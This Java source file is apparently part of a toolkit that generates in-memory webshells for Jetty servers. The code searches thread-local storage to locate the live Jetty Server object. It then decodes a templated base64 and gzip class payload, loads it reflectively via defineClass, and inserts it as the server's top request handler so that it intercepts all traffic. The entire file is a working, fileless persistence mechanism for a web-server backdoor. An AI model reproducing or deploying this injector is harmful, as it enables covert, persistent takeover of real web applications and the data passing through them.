package com.reajason.javaweb.memshell.injector.jetty;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.PrintStream;
import java.lang.reflect.Array;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.Set;
import java.util.zip.GZIPInputStream;

/**
 * @author ReaJason
 */

public class JettyHandlerInjector {

    private static String msg = "";
    private static boolean ok = false;

    public String getClassName() {
        return "{{className}}";
    }

    public String getBase64String() throws IOException {
        return "{{base64Str}}";
    }

    public JettyHandlerInjector() {
        if (ok) {
            return;
        }
        Object server = null;
        try {
            server = getServer();
        } catch (Throwable throwable) {
            msg += "server error: " + getErrorMessage(throwable);
        }
        if (server == null) {
            msg += "server not found";
        } else {
            try {
                msg += ("server: [" + server + "] ");
                Object shell = getShell(server);
                inject(server, shell);
                msg += "[/*] ready\n";
            } catch (Throwable e) {
                msg += "failed " + getErrorMessage(e) + "\n";
            }
        }
        ok = true;
        System.out.println(msg);
    }

    public void inject(Object server, Object handler) throws Exception {
        Object nextHandler = getFieldValue(server, "_handler");
        if (handler.getClass().isAssignableFrom(nextHandler.getClass())) {
            return;
        }
        validateHandler(handler);
        setFieldValue(handler, "nextHandler", nextHandler);
        setFieldValue(handler, "_server", server);

        setFieldValue(server, "_handler", handler);

        // jetty6
        try {
            invokeMethod(invokeMethod(server, "getContainer"), "addBean", new Class[]{Object.class}, new Object[]{handler});
        } catch (Throwable ignored) {

        }
        // jetty 7/8/9/10/11/12
        try {
            invokeMethod(server, "addBean", new Class[]{Object.class, boolean.class}, new Object[]{handler, true});
        } catch (Throwable ignored) {
        }
    }

    public void validateHandler(Object shell) throws Exception {
        Class<?> handlerClass = shell.getClass().getSuperclass();
        Method rightHandleMethod = null;
        for (Method method : handlerClass.getMethods()) {
            if (method.getName().equals("handle")) {
                rightHandleMethod = method;
            }
        }
        shell.getClass().getMethod(
                "handle",
                rightHandleMethod.getParameterTypes()
        );
    }

    @Override
    public String toString() {
        return msg;
    }

    /**
     * org.eclipse.jetty.server.Server
     */
    private Object getServer() throws Exception {
        Set<Thread> threads = Thread.getAllStackTraces().keySet();
        for (Thread thread : threads) {
            try {
                Object table = getFieldValue(getFieldValue(thread, "threadLocals"), "table");
                for (int i = 0; i < Array.getLength(table); i++) {
                    Object entry = Array.get(table, i);
                    if (entry != null) {
                        Object threadLocalValue = getFieldValue(entry, "value");
                        if (threadLocalValue != null) {
                            if (threadLocalValue.getClass().getName().contains("HttpConnection")) {
                                return invokeMethod(invokeMethod(threadLocalValue, "getConnector"), "getServer");
                            }
                        }
                    }
                }
            } catch (Exception ignored) {
            }
        }
        return null;
    }

    @SuppressWarnings("all")
    private Object getShell(Object context) throws Exception {
        ClassLoader classLoader = context.getClass().getClassLoader();
        Class<?> clazz = null;
        try {
            clazz = classLoader.loadClass(getClassName());
        } catch (Exception e) {
            byte[] clazzByte = gzipDecompress(decodeBase64(getBase64String()));
            Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
            defineClass.setAccessible(true);
            clazz = (Class<?>) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length);
        }
        msg += "[" + classLoader.getClass().getName() + "] ";
        return clazz.newInstance();
    }


    @SuppressWarnings("all")
    public static byte[] decodeBase64(String base64Str) throws Exception {
        Class<?> decoderClass;
        try {
            decoderClass = Class.forName("java.util.Base64");
            Object decoder = decoderClass.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
        } catch (Exception ignored) {
            decoderClass = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64Str);
        }
    }

    @SuppressWarnings("all")
    public static byte[] gzipDecompress(byte[] compressedData) throws IOException {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        GZIPInputStream gzipInputStream = null;
        try {
            gzipInputStream = new GZIPInputStream(new ByteArrayInputStream(compressedData));
            byte[] buffer = new byte[4096];
            int n;
            while ((n = gzipInputStream.read(buffer)) > 0) {
                out.write(buffer, 0, n);
            }
            return out.toByteArray();
        } finally {
            if (gzipInputStream != null) {
                gzipInputStream.close();
            }
            out.close();
        }
    }

    @SuppressWarnings("all")
    public static Field getField(Object obj, String name) throws NoSuchFieldException, IllegalAccessException {
        for (Class<?> clazz = obj.getClass();
             clazz != Object.class;
             clazz = clazz.getSuperclass()) {
            try {
                return clazz.getDeclaredField(name);
            } catch (NoSuchFieldException ignored) {

            }
        }
        throw new NoSuchFieldException(obj.getClass().getName() + " Field not found: " + name);
    }


    @SuppressWarnings("all")
    public static Object getFieldValue(Object obj, String name) throws NoSuchFieldException, IllegalAccessException {
        try {
            Field field = getField(obj, name);
            field.setAccessible(true);
            return field.get(obj);
        } catch (NoSuchFieldException ignored) {
        }
        return null;
    }


    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        Field field = getField(obj, fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static Object invokeMethod(Object targetObject, String methodName) throws NoSuchMethodException, IllegalAccessException, InvocationTargetException {
        return invokeMethod(targetObject, methodName, new Class[0], new Object[0]);
    }

    @SuppressWarnings("all")
    public static Object invokeMethod(Object obj, String methodName, Class<?>[] paramClazz, Object[] param) throws NoSuchMethodException {
        try {
            Class<?> clazz = (obj instanceof Class) ? (Class<?>) obj : obj.getClass();
            Method method = null;
            while (clazz != null && method == null) {
                try {
                    if (paramClazz == null) {
                        method = clazz.getDeclaredMethod(methodName);
                    } else {
                        method = clazz.getDeclaredMethod(methodName, paramClazz);
                    }
                } catch (NoSuchMethodException e) {
                    clazz = clazz.getSuperclass();
                }
            }
            if (method == null) {
                throw new NoSuchMethodException("Method not found: " + methodName);
            }
            method.setAccessible(true);
            return method.invoke(obj instanceof Class ? null : obj, param);
        } catch (NoSuchMethodException e) {
            throw e;
        } catch (Exception e) {
            throw new RuntimeException("Error invoking method: " + methodName, e);
        }
    }

    @SuppressWarnings("all")
    private String getErrorMessage(Throwable throwable) {
        PrintStream printStream = null;
        try {
            ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
            printStream = new PrintStream(outputStream);
            throwable.printStackTrace(printStream);
            return outputStream.toString();
        } finally {
            if (printStream != null) {
                printStream.close();
            }
        }
    }
}
